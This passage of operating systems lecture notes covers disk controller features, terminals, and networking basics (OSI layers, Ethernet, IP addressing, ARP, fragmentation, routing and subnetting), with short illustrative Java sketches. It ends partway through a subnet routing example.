• Bad blocks. As mentioned above, some disk firmware locates and remaps bad blocks on disk directly.
• Caching. Most disks and disk controllers cache one or more tracks of data in memory on the hardware. Sectors on those tracks are read not from the disk but from the memory, eliminating the rotational and seek delays.
• Arm Scheduling. Smart disk controllers, for example high-end SCSI controllers, allow several outstanding simultaneous requests for data from the same disk. The controller firmware schedules the requests internally.

In some sense, this is all positive news: the software has less to do and life is great. In practice this may be less straightforward. There are two problems: the software and hardware may be unaware of each other, and there is a lack of flexibility. For an example of the hardware and software being at cross purposes, consider the disk interleaving case. The Berkeley fast file system did clever layout of file blocks within a track to reduce the rotational latency when the file was read sequentially. The file system spends some additional time when blocks are allocated to ensure that they're placed to minimize latency - and then the hardware moves them again because of its interleaving. The result is a block layout that is almost certainly suboptimal. You can find similar problems with the other helpful features above: transparently repaired bad blocks may show up as a performance penalty; caching sectors both in memory and on disk is wasteful and degrades the value of one of the caches; and spending CPU time to schedule the disk arm in the device driver, only to have the controller do the same algorithm in hardware, is a waste of CPU time.

The other problem, lack of flexibility, exists primarily if the features of the hardware cannot be disabled: burning algorithms into hardware makes them hard to change. The solution is to make sure that the hardware and OS are aware of what the other is doing. Ideally, the OS should detect hardware features and either disable the ones that are replicated in the OS, or disable the OS routines that do work done by the controller.

As we have seen, for every scheduling algorithm there is a counter-scheduling strategy that confuses it. If your workload is a counter-strategy for the algorithms wired into your hardware, performance will suffer. Frequently it's faster to tune or recode an algorithm in the OS than in hardware, but if you can't disable the smart feature of the hardware, you're sunk.

Terminals

Terminal is a generic term for the keyboard/screen pair through which much of the computer input in the world today occurs. In times past, this was largely through serial line (RS-232) terminals that passed data a bit at a time, although these days a large number of terminals are intelligent or memory mapped (or both). The console keyboard, screen and mouse of a PC or workstation fall into the latter category.

Serial terminals conceptually process data a character or line at a time. (In reality, data may be transmitted a bit at a time down the serial wire, but the device generally collects 7 or 8 bit words to work with.) Particularly intelligent terminals may have data stream editing capabilities built in, or they may be provided by the device driver. When we say character editing capabilities, we mean everything from cursor control to simple character erasures. To effect such editing, the device driver often collects characters as the keyboard transmits them, only committing the characters to the standard input of the running process when the enter key is sent (a sketch of such a line discipline appears at the end of this subsection). Smart terminals may do the same thing in the hardware.

For output, terminals have a simple language of output functions. A particular string of nonprinting characters may serve to move the output cursor (the point at which the next character will be output) to a given position, or to clear or scroll areas of the screen1. The device driver is responsible for arranging for canonical output control sequences to be translated into the specific sequences that the terminal hardware understands.

Even in a world of windowing systems and GUIs, the concept of a terminal is useful for its simplicity and power. The concepts carry over to line-driven modem systems and other simple devices - for example, Coke machines.2

On the other end of the spectrum are bit-mapped displays and modern graphics processors. A bit-mapped display has its drawing memory directly accessible to the driver in a way that allows the driver to draw graphics on the screen directly. Coupled with a pointing device, this allows completely graphically oriented user interfaces (GUIs). The screen driver directly draws the windows and other screen cues that allow a user to navigate the GUI. There are usually routines either in the kernel or in user libraries to facilitate such constructs. The interface contains simple interface elements (called Widgets or Gadgets or other things, depending on whether you're on an X machine, an Amiga, or some lesser machine). These libraries create the visual cues for the user and respond to events generated by the pointer driver.

The pointer driver keeps track of the user's reference point into the bit-mapped display, used to manipulate GUI elements. The driver receives interrupts from the pointer whenever the pointer device moves, changing the location of the reference point. Generally any motion results in an interrupt, so the ISRs that follow the pointer must be quick. Most pointers supply only relative motion events; the device driver must track the reference point and update the GUI element indicating its location.3
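Here is the promised sketch of driver-side line editing: characters accumulate in a buffer, erase characters edit it, and nothing reaches the process's standard input until the enter key arrives. The character choices (backspace, newline) are illustrative.

    import java.util.ArrayDeque;

    class LineDiscipline {
        static final StringBuilder line = new StringBuilder();      // being edited
        static final ArrayDeque<String> stdin = new ArrayDeque<>(); // committed

        // Called by the keyboard ISR (or a smart terminal) per character.
        static void receive(char c) {
            if (c == '\b') {                       // erase: edit, don't commit
                if (line.length() > 0) line.deleteCharAt(line.length() - 1);
            } else if (c == '\n') {                // enter: commit the line
                stdin.add(line.toString());
                line.setLength(0);
            } else {
                line.append(c);
            }
        }

        // A read() from the process blocks until a committed line exists;
        // here we just return null instead of blocking.
        static String read() {
            return stdin.poll();
        }
    }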

The pointer and drawing routines work together to provide an event stream to the OS and applications, which the applications can then use to get user input. Events are asynchronous notifications that contain information like "the user has activated button number 5" or "the reference pointer is over slider 2." The exact mechanisms of delivering events vary widely, and this class won't really discuss them in detail. Hopefully your understanding of IPC has already given you some ideas: a record-based file of events; signals that carry additional information; monitors with procedures defined for various events.

Beyond bit-mapped displays are terminals with graphics co-processors. These are dedicated processors that do nothing but render detailed images on the terminal, perhaps employing sophisticated lighting and texture effects. The language used to communicate with such processors may be very intricate, and using them more resembles programming a multiprocessor than running a peripheral. We won't discuss these in detail either, but again your experiences with interprocess communication should give you some ideas of the interfaces in use here: locks and semaphores to control access to the lists of polygons to be drawn by the co-processor but arranged by the main CPU, for example, or context switching a color map on the co-processor when the reference point moves from one window to another.

There are other devices in the world, too, that we won't have time to investigate: sound recording and playback systems that input and output sampled streams of data that have to be filtered in real time; network adapters that need to fragment and reassemble large data blocks into small ones to be transferred across a network (and that may have to determine a route across such a network); and other, stranger things.

1 Some terminals allow individual pixels to be addressed or vectors drawn, for graphics capabilities.
3 Some devices, like touch screens and graphics pads, do give absolute coordinate locations.


Computer networking is becoming a bigger and bigger issue every day. It's a versatile and inexpensive way to share resources and trade data. This section addresses the basic OS issues involved in communicating between computers.

Network vs. System Domain

[Figure: several hosts, each attached to a router, connected through a network]

host That’s the same diagram from our discussion of the I/O system, only relabeled to represent a computer network. Some of the issues are remarkably similar. The system still has to address: • • Asynchrony: Events on different hosts are not synchronized. Data corruption and reordering: Reordering is similar to the problem of multiplexing responses, and is handled the same way. Data in the packets can be used to order data. Because there are more sources of error in the network, the OS has to address errors directly. Buffering: Each host is responsible for queuing data until the interested process retrieves it, similar to the way disk blocks are queued. There are some significant differences between a network and a hardware system, though: Autonomy: Individual pieces of hardware in a system are all controlled by the same entity, the owner of the machine or the CPU. In a network, each host may be an autonomous (or selfcontrolling) entity, with goals that may be in direct opposition of other hosts and no central authority to which to appeal to resolve conflicts. If this wasn’t enough to worry about in the abstract, there is the problem of two communicating entities sitting in different human domains. The legal requirements on the hardware or even the data content are often at issue. Latency: The latency between a CPU and a disk is a few tens of milliseconds at worst, and this is perceived as a glacial pace. The round trip time to a geosynchronous satellite and back is a quarter second. There are documented reports of packets taking minutes to get from host to host in the Internet. The latencies are often considerably higher in a network. But sometimes they are lower. Hosts on an uncontested LAN sometimes use a distributed file system to reduce disk latency. The range of latencies with which systems have to contend in networks is the issue. Connectivity Richness: In a physical box, there are only so many elements that can sit physically on one bus, so the CPU need only concern itself with a few entities. There are millions of computers connected to the Internet. Systems have to exhibit vastly different scaling properties in networks.

Basic Concepts
Because there are so many more elements, connected sparsely, issues of naming, addressing, and routing become paramount. It's important to grasp the distinction between a name, an address, and a route.

Names are a convenient way for humans (or programs) to refer to an entity. My name is Ted; my computer's name is vermouth.isi.edu. In both cases this is just a convenient string of characters that refers to a physical entity.

Addresses are a special kind of name that can be used to plot a path to reach one of the entities. My address in Madison, Wisconsin was 765 W. Washington Ave. #302, Madison, WI 53715. My computer's address is … . These names are special because they can be used to convey information to the place they name. (Not all things that are namable have an address.)


Routes are a description of how to convey information between two addresses. A route to my address in Wisconsin from USC would be the set of interstate highways and side streets to use to get from here to there. A route to my computer from a computer at USC would be a list of the IP addresses to pass through, in order. Postal addresses form a similar, if less structured, name/address/route space.

In some sense, addresses and routes are the only entities that are required for networking, but having names is so useful that most general purpose networking systems have some naming mechanism. Defining and allocating these entities is one of the most difficult parts of networking. That the Internet provides a global (in the purest sense of that word) naming, addressing, and routing system is nothing short of phenomenal. This is only possible because the system was designed to scale to global sizes.1 The impressive part of the Internet is that the space is well enough defined that machines can move the data with minimal per-message human intervention. The Internet is not the only such system, of course.

Another basic concept that underlies networking is the protocol. A protocol is a set of rules that communicating entities follow in order to communicate meaningfully. For example, exchanging electronic mail requires a sequence of exchanges between the mailing machine and the receiving (or forwarding) machine: the mailer identifies itself, and the receiver acknowledges it; the mailer tells who the mail is from, and the receiver accepts or rejects the address; the mailer tells who the mail is to, and the receiver again accepts or rejects; finally the message is exchanged and acknowledged. That set of rules is a protocol.

Protocols give rise to standards. A standard is a formal presentation of a protocol that has been sanctioned by some official body; for example, the electronic mail protocol above has been sanctioned by the Internet Engineering Task Force (IETF). Internet standards are presented in Request For Comments documents - RFC for short. Standards are important because they represent an agreement between major practitioners of the field. If your system claims to exchange RFC822-compliant mail2, it must follow those rules - this is called conforming to the standard. Of course, if your mailer doesn't conform to the standard but sends mail without losing any, the only thing that happens is that you can't put an RFC822-compliant sticker on it. Conforming to standards provides a loose guarantee that systems interoperate.

Another word that networkers use a lot is packet. A packet is like a disk block - it's an element of data exchanged between 2 hosts. Depending on the underlying hardware and its associated protocols, packets may be fixed or variable length, and there are different maxima and minima for the various packet parameters. It's best to think of packets as atomic elements of networking.

The final basic distinction to draw is between connection-oriented and connectionless communications. This is exactly the difference between the post office and the phone system. In the mail, two units of transmission (2 letters) have no relation to each other, even if sent between the same 2 people. If you send them to the same place on the same day, you can't usually tell what order they were sent in, or even if they bear any relation to each other; there's no state that ties them together. On a phone call, the words that go in one end of the phone are not arbitrarily reordered; the notion that the various transmissions (words, or different family members talking) have some relation is encapsulated by the idea of a call - although, as we'll see, that can be an illusion.

1 Even at that, cracks are showing: the address space may not be large enough, routing information taxes the ability of hardware to store and search it, and the naming system - the one that we had working - is under assault from lawyers.

There are networks that support both these paradigms. In fact, each can be supported by the other: electronic mail is connectionless in the sense that each piece of mail has no ordering relative to others, yet the mail is transferred using TCP, a connection-oriented protocol.

The Seven Layer Model

The seven layer model is the OSI (an international standards body) model for designing networking. As a tool for understanding the various issues in networking, it's not bad, and we'll use it to talk about protocol design - though we'll see that some services are replicated and some don't fit neatly into a layer. As a model for implementation, taken literally, it's a recipe for a slow network, so think more seriously about what you're doing before you implement something this way. Each level of the stack provides services to the layers above it using building blocks provided by the layers below it. Each layer adds a header to outgoing packets, and strips it off incoming packets before passing the packet up or down the stack, as the case may be. Conceptually, an outgoing packet would have headers:

[Figure: a packet's data nested inside successive layer headers]

Numbering the layers from the bottom up:

Physical

The physical layer specifies the format of bits on the wire: what kinds of wire you can use, how far apart nodes have to be (or can be), and what you'd see if you hooked up an oscilloscope (or spectrum analyzer) to the medium. Physical layer standards tell you what kinds of hardware to buy. This is very nuts and bolts electrical (or optical!) engineering stuff, and I won't discuss it in any great detail.

Link

The link layer describes the protocols used by communicating nodes connected by the same physical hardware; the scope of its names, addresses and routes is therefore constrained. Each type of hardware has its own standard: there's an Ethernet standard, an X.25 standard, a FDDI standard, and a bunch more.

In a shared medium network3, the link layer is responsible for medium access: the process of determining which host has the right to send information on the shared medium. There are many ways to do this. Ethernet uses CSMA/CD (Carrier Sense Multiple Access/Collision Detection), which means that each host listens to the shared line and doesn't send until the line is silent - that's the carrier sense. Even listening beforehand, it's possible for 2 hosts far enough apart to hear the line clear, begin transmitting, and have their signals collide - detecting this is the collision detection. If that happens, they both stop transmitting and remain silent for a random time period before trying again; the time they remain silent gets geometrically larger. A sketch of this backoff appears below.

Other medium access methods involve passing a token from host to host. Like the conch shell in Lord of the Flies, the token allows the holder the right to send uninterrupted. Tokens generally have a fixed lifetime, so that a host can only transmit for a given time period before it is forced to relinquish the token and pass it to the next host; the protocols guarantee that every host gets the token eventually. FDDI (Fiber Distributed Digital Interface) and token rings use tokens.

Link layers are also the first layer that detects (and potentially recovers from) transmission errors.
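The backoff is easy to sketch. The slot time constant and the cap of 10 doublings are the classic Ethernet choices, stated here as assumptions.

    import java.util.Random;

    class Csma {
        static final Random rng = new Random();
        static final long SLOT_NANOS = 51200;   // assumed slot time (512 bit times)

        // After the n-th consecutive collision, wait a random number of
        // slots in [0, 2^min(n,10)): binary exponential backoff.
        static long backoffNanos(int collisions) {
            int exp = Math.min(collisions, 10);
            long slots = rng.nextInt(1 << exp);
            return slots * SLOT_NANOS;
        }

        public static void main(String[] args) {
            for (int n = 1; n <= 5; n++)
                System.out.println("after collision " + n + ": wait "
                        + backoffNanos(n) + " ns");
        }
    }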

This is usually accomplished by including a checksum in each packet. A checksum is a mathematical function that depends on the full contents of the packet, like the one-way functions used for authentication. Upon receiving the packet, a host will recompute the function (assuming the checksum field to be 0) and, unless it gets the same answer as the packet contained, reject the packet. Choosing a good checksum is a difficult tradeoff: the more effective the checksum is at detecting errors, the slower it is to calculate, and because the checksum must be calculated for every packet, the speed of calculating it can determine the network speed. The science of constructing efficient strong checksums is interesting in its own right. (A sketch of a simple checksum appears after the layer descriptions below.)

Some link layers correct errors, either by labeling the packets, acknowledging each packet receipt, and retransmitting packets if there is no acknowledgement in a reasonable time, or by sending redundant data and reconstructing damaged packets. This second idea is also used in disk drive arrays, like RAID. You'll hear more about it in CS 555.

Network

The network layer connects hosts on different physical networks. It extends the ideas of addressing, naming, and routing to their global extreme; the headers added at the network layer are independent of the network hardware. The network layer solves some difficult distributed problems, e.g., how to store routes from every host to every host efficiently. Actually, it just makes sure that certain routers in the network know enough to send the packet in the right general direction, with each router knowing more about its local area. I don't have time to really address these problems in this class, but I strongly advise you to check out one of the networking classes to find out for yourself.

Transport

The transport layer provides link-layer-style guarantees across the network layer: for example, transport resends lost packets and prevents reordering, using techniques similar to the link layer's. Transport also provides demultiplexing within the computer systems: the network layer can name, address and route to a given computer; within the computer, the transport layer provides a way to name, address and route to given processes. Transport is also the layer that addresses global performance of the network, for example congestion control and resource allocation.

Session

The session layer provides further multiplexing, control over which endpoint is sending data, and some checkpointing behavior. It's not often used; it's something of an open question if this functionality is important.

Presentation

This layer is responsible for reformatting data between machines and providing data-based semantics. Converting floating point formats between hosts, or only returning packets that contain a given type field, are things that fall under Presentation's umbrella. Like the Session layer, Presentation isn't often used.

Application

These are protocols designed to carry out some useful, concrete service. SMTP - the email protocol - is an application layer protocol. So is HTTP (although it's extending its tentacles into Session and Presentation as well). These are also standardized; there are lengthy documents on what a valid HTTP request looks like or on what behavior an FTP server has to support. They're dry reading, but important to interoperability.

3 Ethernets are a shared medium because many hosts use the same wire to communicate, while dial-up modems are a point-to-point medium because the connections directly connect only 2 hosts. I'd use the party line analogy, but I fear that no one of an age to read or hear this knows what one is.
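As the promised illustration, here is the 16-bit ones' complement sum used by the Internet protocols - one point on the strength/speed curve, chosen only as an example of the verify-by-recomputing scheme described above.

    class Checksum {
        // 16-bit ones' complement sum of the data (the Internet checksum).
        // The sender stores the complement of the sum in the checksum field;
        // the receiver recomputes over the same bytes with that field zeroed.
        static int checksum(byte[] data) {
            long sum = 0;
            for (int i = 0; i < data.length; i += 2) {
                int word = (data[i] & 0xFF) << 8;
                if (i + 1 < data.length) word |= (data[i + 1] & 0xFF);
                sum += word;
                sum = (sum & 0xFFFF) + (sum >> 16);   // fold the carry back in
            }
            return (int) (~sum & 0xFFFF);
        }

        public static void main(String[] args) {
            byte[] packet = "an example packet".getBytes();
            int stored = checksum(packet);     // computed by the sender
            packet[3] ^= 0x40;                 // corrupt one bit in transit
            System.out.println(checksum(packet) == stored
                    ? "accept" : "reject");    // prints "reject"
        }
    }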

Other Global Issues
I probably won't have time to talk about these in detail, but other networking issues include:

• Scalable Naming
• Authentication and Security
• Network Management
• Other Communication Models - broadcast & multicast
• Performance Tuning of Protocols
• Active Networking

Networking Note

Networking deals with interconnected groups of machines talking with each other. It is a very different field than operating systems, with a lot of standards work, because everyone must agree on what to do when machines are connected together.

What is a network? A collection of machines, links and switches set up so that machines can communicate with each other. Some examples:

• Telephone system. Machines are telephones, links are the telephone lines, and switches are the phone switches.
• Ethernet. Machines are computers, there is one link (the ethernet) and no switches.
• Internet. Machines are computers, there are multiple links, both long-haul and local-area. The switches are gateways.

A message may have to traverse multiple links and multiple switches to go from source to destination.

Circuit-switched versus packet-switched networks. Basic disadvantage of circuit-switched networks: cannot use resources flexibly. Basic advantage of circuit-switched networks: they deliver a guaranteed resource.

Basic networking concepts:

• Packetization.
• Addressing.
• Routing.
• Buffering.
• Congestion.
• Flow control.
• Unreliable delivery.


Local Area Networks

Local area networks connect machines in a fairly close geographic area. The standard for many years: Ethernet, standardized by Xerox, Intel and DEC in 1978, and still in wide use.

Physical hardware technology: coax cable about 1/2 inch thick. Maximum length: 500 meters, extendable with repeaters; but there can only be two repeaters between any two machines, so the maximum length is 1500 meters. Vampire taps connect machines to the Ethernet: attach an ethernet transceiver to the tap; the transceiver makes the connection between the Ethernet and the host interface, and the host interface then connects to the host machine.

Ethernet is a 10 Mbps bus with distributed access control. It is a broadcast medium: all transceivers see all packets and pass all packets to the host interface. The host interface chooses the packets the host should receive and discards the others.

Access scheme: carrier sense multiple access with collision detection. Each access point senses the carrier wave to figure out if the medium is idle. To transmit, it waits until the carrier is idle, then starts transmitting. Each transmission consists of a packet; there is a maximum packet size.

Collision detection and recovery: transceivers monitor the carrier during transmission to detect interference. Interference can happen if two transceivers start sending at the same time; if it does, the transceiver detects a collision. When a collision is detected, it uses a binary exponential backoff policy to retry the send, adding a random delay to avoid synchronized retries. Is there a fixed bound on how long it will take a packet to get successfully transmitted? Is any packet guaranteed to be transmitted at all?

Addressing. Each host interface has a hardware address built into it. Addresses are 48 bits long; when you change the host interface hardware, the address changes. There are three kinds of addresses:

• Physical address of one network interface.
• Broadcast address for the network (all 1's).
• Multicast addresses for a subset of machines on the network.

The host interface looks at all packets on the ethernet. It passes a packet on to the host if the address in the packet matches its physical address or the broadcast address. Some host interfaces can also recognize several multicast addresses, and pass packets with those addresses on to the host. How do vendors avoid ethernet physical address clashes? They buy blocks of addresses from a central authority.

Packet (frame) format:

• Preamble. 64 bits of alternating 1s and 0s, to synchronize receivers.
• Destination address. 48 bits.
• Source address. 48 bits.
• Packet type. 16 bits. Helps the OS route packets.
• Data. 368-12000 bits.
• CRC. 32 bits.
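A sketch of how a host interface (or driver) might pick the fields out of a received frame. Offsets follow the list above, counted after the preamble is stripped; the helper names are invented.

    class EthernetFrame {
        // Field offsets in bytes, after the 8-byte preamble is stripped.
        static final int DEST = 0, SRC = 6, TYPE = 12, DATA = 14;

        static long address(byte[] f, int off) {     // 48-bit address as a long
            long a = 0;
            for (int i = 0; i < 6; i++) a = (a << 8) | (f[off + i] & 0xFF);
            return a;
        }

        static int type(byte[] f) {                  // 16-bit type field
            return ((f[TYPE] & 0xFF) << 8) | (f[TYPE + 1] & 0xFF);
        }

        // The self-identifying property: the type field says which protocol
        // module (IP, ARP, ...) should receive the data.
        static boolean accept(byte[] f, long myAddress) {
            long dest = address(f, DEST);
            return dest == myAddress || dest == 0xFFFFFFFFFFFFL;  // broadcast
        }
    }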

Ethernet frames are self-identifying: you can just look at a frame and know what to do with it. This makes it possible to multiplex multiple protocols on the same machine and network without problems. The CRC lets a machine identify corrupted packets.

Token-ring networks are an alternative to ethernet style networks. Arrange the network in a ring, and pass around a token that lets a machine transmit; a message flows around the network until it reaches its destination. Some problems: long latency, token regeneration.

ARPANET. Ancestor of the current Internet. A long-haul packet-switched network, it consisted of about 50 C30 and C300 BBN computers in the US and Europe connected by long-haul leased data lines. All of these computers were dedicated packet-switching machines (PSNs). Interesting fact: the ARPANET, like the highway system, was initially a DOD project set up officially for defense purposes. In the original ARPANET, each computer connected to the ARPANET connected directly to a PSN; each packet contained the address of the destination machine, and the PSN network routed the packet to that machine. Now this is totally impractical, and machines have a much more complex local structure before they get onto the Internet.

The design of the Internet was driven by several factors:

• There will be multiple networks. Different vendors compete, plus there are different technical tradeoffs for local area, wide area and long haul networks.
• People want universal interconnection.

There will be multiple networks around the world. An internetwork, or internet, connects the different networks; so the job of an internet is to route packets between networks. One goal of the Internet is network transparency: we want a universal space of machine identifiers, and to refer to all machines on the internet using this universal space, without imposing a specific interconnection topology or hardware structure.

Internet architecture. Connect two networks using a gateway machine. The job of the gateway is to route packets from one network to another. As network topologies become more complicated, gateways must understand how to route data through intermediate networks to reach a final destination on a remote network. In the Internet, gateways provide all interconnections between physical networks. All gateways route packets based on the network that the destination is on.

Internet addressing. Each host on the Internet has a unique 32-bit address that is used for all Internet traffic to that host. Each internet address is a (netid, hostid) pair: the netid identifies the network that the host is on, and the hostid identifies the host within that network.

There are three primary classes of Internet addresses, plus two special ones:

• Class A. First bit: 0. Bits 1-7: Netid. Bits 8-31: Hostid. Can have 128 Class A networks.
• Class B. Bits 0-1: 10. Bits 2-15: Netid. Bits 16-31: Hostid. Can have 16,384 Class B networks.
• Class C. Bits 0-2: 110. Bits 3-23: Netid. Bits 24-31: Hostid. Can have about 2 million Class C networks.
• Class D. Bits 0-3: 1110. Multicast addresses, used for Internet multicast.
• Class E. Bits 0-3: 1111. Reserved.

Dotted decimal notation: reading Internet addresses as four decimal integers, with each integer representing one byte. For example:

• cs.ucsb.edu - 128.111.41.20
• lcs.mit.edu - 18.26.0.36
• cs.stanford.edu - 36.8.0.47 (what kind of network is it on?)
• ecrc.de - 141.1.1.1
• sri.org - 199.88.22.5

Who assigns internet addresses? The Network Information Center! A centralized authority, it just allocates network ids, leaving the requesting authority to allocate host ids. Because the network id is encoded in the Internet address, a machine's internet address must change if it switches networks. Conceptually, an Internet address identifies a host. Exception: gateways have multiple internet addresses, at least one per network that they are connected to.

Interesting point: the whole structure of the internet is available in RFC's (Requests For Comments), themselves available over the Internet - use the net search functionality for RFC and you'll find pointers. You can read them to figure out what is going on.

Gateways have two responsibilities:

• Route packets, based on network id, to a gateway connected to that network. Gateways can extract the network portion of an address quickly.
• If they are connected to the destination network, make sure the packet gets delivered to the correct machine on that network.

Mapping Internet addresses to physical network addresses. We will discuss the case when the physical network is an Ethernet. Given a 32-bit Internet address, a gateway must map it to a 48-bit Ethernet address, using the Address Resolution Protocol (ARP). The gateway broadcasts a packet containing the Internet address of the machine that it wants to send a packet to. When the machine with that Internet address receives the ARP packet, it sends back a response containing its physical address, and the gateway uses the physical address to send the packet directly to the machine. This also works for machines on the same network even when they are not gateways; machines realize they are on the same network by looking at the netid of the Internet address. An address resolution cache is used to eliminate most ARP traffic.
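Since the class of an address is determined by its leading bits, the netid can be extracted with a few shifts. A sketch (the splits follow the table above):

    class IpClass {
        // Split a 32-bit address into {netid, hostid} by its leading bits.
        static int[] split(int addr) {
            if ((addr >>> 31) == 0)            // 0xxx... : Class A
                return new int[]{(addr >>> 24) & 0x7F, addr & 0xFFFFFF};
            if ((addr >>> 30) == 0b10)         // 10xx... : Class B
                return new int[]{(addr >>> 16) & 0x3FFF, addr & 0xFFFF};
            if ((addr >>> 29) == 0b110)        // 110x... : Class C
                return new int[]{(addr >>> 8) & 0x1FFFFF, addr & 0xFF};
            throw new IllegalArgumentException("class D/E: no netid/hostid split");
        }

        public static void main(String[] args) {
            int ucsb = (128 << 24) | (111 << 16) | (41 << 8) | 20; // 128.111.41.20
            int[] parts = split(ucsb);
            System.out.println("netid=" + parts[0] + " hostid=" + parts[1]);
        }
    }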

ARP request and response frames have specific type fields, set up by the Ethernet standard authority: ARP frames have a type field of 0806, and RARP frames have 8035.

How does a machine find out its own Internet address? It can store the address on disk and look there when it boots up. What if it is diskless? It contacts a server and finds out its address using Reverse ARP (RARP), described in RFC 903 (Ross Finlayson et al.). The RARP request is broadcast to all machines on the network; the RARP server looks at the physical address of the requestor and sends it a RARP response containing the internet address. Usually there is a primary RARP server, to avoid excessive traffic.

Now switch to talking about IP - the Internet Protocol. The internet conceptually has three kinds of services layered on top of each other: a connectionless, unreliable packet delivery service; a reliable transport service; and application services. IP is the lowest level - the packet delivery. The basic unit of transfer in the Internet is the IP datagram, which has a header and data. The header contains internet addresses, and the Internet routes IP datagrams based on the Internet addresses in the header. IP packets always travel from gateway to gateway across physical networks.

The Internet makes a best effort attempt to deliver each datagram, but does not deal with error cases. In particular, you can have:

• Lost packets
• Duplicated packets
• Out of order packets

Higher level software layered on top of IP deals with these conditions.

Why is there a need for the possibility of fragmentation? There is no good way to impose a uniform packet size on all networks: some networks may support large packets for performance, while others can only route small packets. We should not prevent some networks from using large packets just because there exists a network somewhere in the world that cannot handle them - that would violate network transparency. But then we must be able to route large packets through a network that only handles small packets. IP is designed to deal with this situation and provides for fragmentation: if the IP packet is larger than the physical network frame size, it is fragmented - chopped up into multiple physical packets. Once a packet has been fragmented, it must be reassembled back into a complete packet. Fragments are usually reassembled only when they reach the final destination; conceptually, one could build a system that reassembled fragments when they got to a physical network with a larger frame size.

Important fields in the IP header:

• VERS: protocol version.
• LEN: length of header, in 32-bit words.
• TOTAL LEN: total length of IP packet.

• SOURCE IP ADDRESS: IP address of source machine.
• DEST IP ADDRESS: IP address of destination machine.
• IDENT: packet identifier, unique for each source. The source maintains a global counter that it increments for every IP datagram sent.
• FLAGS: a do-not-fragment flag (dangerous) and a more-fragments flag; a more-fragments flag of 0 marks the end of the datagram.
• FRAGMENT OFFSET: gives the offset of this fragment in the original datagram.
• TTL: time to live - how many hops the packet may take without getting removed from the Internet. Every time a gateway forwards the packet, it decrements this field. This is required to deal with things like cycles in routing.

How to reassemble a fragmented packet? Allocate a buffer for each packet. Use IDENT and SOURCE IP ADDRESS to identify the original datagram to which each fragment belongs, and use the FRAGMENT OFFSET field to write each fragment into the correct spot in the buffer. Use the more-fragments flag to find the end of the original datagram, and use some mechanism to make sure all fragments have arrived before considering the datagram complete.

Routing IP datagrams. There are multiple possible paths between hosts in an internet; how do we decide which path for which datagram?

• Routing for hosts on the same network: they realize they are on the same network by looking at the netid of the Internet address, and just use the underlying physical network.
• Routing for hosts on different networks: gateways pass datagrams from network to network until they reach a gateway connected to the destination network. Each gateway must decide the next gateway to send the datagram to:
• Source routing. The source specifies the route in the datagram. Useful for debugging and other cases in which the Internet should be forced to use a certain route; used mostly for debugging. Host-specific routes similarly specify a specific route for each host, and are also used mostly for debugging.
• Table driven routing. Each gateway has a table indexed by destination network id; each table entry tells where to send datagrams destined for that network.
• Default routes. Specify a default next gateway to be used if the other routing mechanisms don't give a route: such gateways know how to route some packets, and pass the others along to a default router. Typically, all defaults point to a router that knows how to route ALL packets.

Most routers use a combination of table driven routing and default routing. (Do the example on page 82.)
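A sketch of that combined forwarding decision; the table contents and gateway names are invented.

    import java.util.HashMap;

    class IpForwarder {
        // netid -> next-hop gateway, plus a default for everything else.
        static final HashMap<Integer, String> routes = new HashMap<>();
        static final String DEFAULT_GATEWAY = "gw-default";

        static String nextHop(int destNetid, int myNetid) {
            if (destNetid == myNetid)
                return "deliver directly on the physical network";
            String gw = routes.get(destNetid);        // table driven routing
            return gw != null ? gw : DEFAULT_GATEWAY; // else the default route
        }

        public static void main(String[] args) {
            routes.put(18, "gw-mit");                 // invented entries
            System.out.println(nextHop(18, 128));     // gw-mit
            System.out.println(nextHop(36, 128));     // gw-default
        }
    }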

How are routing tables acquired and maintained? There are a lot of different protocols, but the basic idea is that the gateways send messages back and forth advertising routes. Each advertisement says that a specific network is reachable via N hops; some protocols also include information about the different hops. The gateways use the route advertisements to build routing tables.

In the original Internet, gateways were partitioned into two groups: core and noncore gateways. Core gateways have complete information about routes. The original core gateways used a protocol called GGP (Gateway to Gateway Protocol) to update routing tables. GGP messages allow gateways to exchange pairs of messages; each message advertises that the sender can reach a given network N in D hops. The receiver compares its current route to the new route through the sender, and updates its tables to use the new route if it is better. In practice this doesn't always work as well as designed. Famous case: the Harvard gateway bug, where a memory fault caused a gateway to advertise a 0-hop route to everybody! Another problem with GGP: the distributed shortest path algorithm may take a long time to converge. A later algorithm (SPF) replicated a complete database of network topology in every gateway; each gateway runs a local shortest path computation to build its tables. In the current Internet, routing tables change in response to changes in the network: the routers talk a route advertisement protocol and implement some routing algorithm.

The Internet was originally designed to survive military attacks. It has lots of physical redundancy, and its routing algorithm is very dynamic and resilient to change: if a link goes away, the network should be able to route around the failure and still deliver packets. A common error is routing all of the links that are supposed to give physical redundancy through the same fiber run, making them vulnerable to one backhoe. Indeed, the chief threat to Internet links these days is backhoes, not bombs.

In the current Internet, there is no longer any central backbone or authority; the whole system has switched over to private enterprise. A top-down view of the system: there are 4 Network Access Points (NAPs). Each NAP is a very fast router connected via high-capacity lines to other gateways and NAPs. Typically big communications companies (MCI, Sprint, ATT) own the lines. Lines are typically fiber, and may be T3 (about 45 Mb/s) lines. An internet provider buys a bunch of routers (usually from Cisco) and leases a bunch of lines; the provider must also buy access to a NAP, or to a gateway that leads to a NAP. The internet provider can then turn around and sell internet access to whoever wants to buy it. Organizations go to internet providers to get access to the internet. For example, UCSB buys its internet access from CERFNET, and it pays $23,000 per year for that access. All of the UC schools will band together and buy internet access from MCI, getting more bandwidth but at a higher price.

Organizations tend to chop their communications up into multiple networks; for example, the UCSB CS department has more than 10 networks. There are too many networks in the world to give every such network an Internet address. The solution is subnetting. UCSB has one class B Internet network, and the Internet views the whole organization as having that one network. The organization itself chops the host part of the IP address up into a pair of local network and local host: the third byte of every IP address identifies a local network, and the fourth byte is the host on that network.

As far as the Internet is concerned, all of UCSB has only one network. All IP packets from outside come to one UCSB gateway (by default); the Internet routes to the UCSB gateway based on the Internet network id. Inside UCSB, there is a set of networks connected by routers. These routers interpret the IP address as containing a local network identifier and a host on that network, and route the packet within the UCSB domain based on the subnet id. The routers periodically advertise routes using a protocol called RIP. This is an example of hierarchical routing.
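A sketch of the two-level decision, assuming the class B network 128.111 and the third-byte subnetting described above. The table contents and router names are invented.

    import java.util.HashMap;

    class SubnetRouter {
        static final int NETID = (128 << 8) | 111;    // our class B network
        static final HashMap<Integer, String> subnetRoutes = new HashMap<>();

        public static void main(String[] args) {
            subnetRoutes.put(41, "router-A");             // 128.111.41.0
            subnetRoutes.put(42, "router-B");             // 128.111.42.0
            System.out.println(route(ip(128, 111, 41, 20)));  // router-A
            System.out.println(route(ip(18, 26, 0, 36)));     // default gateway
        }

        static String route(int addr) {
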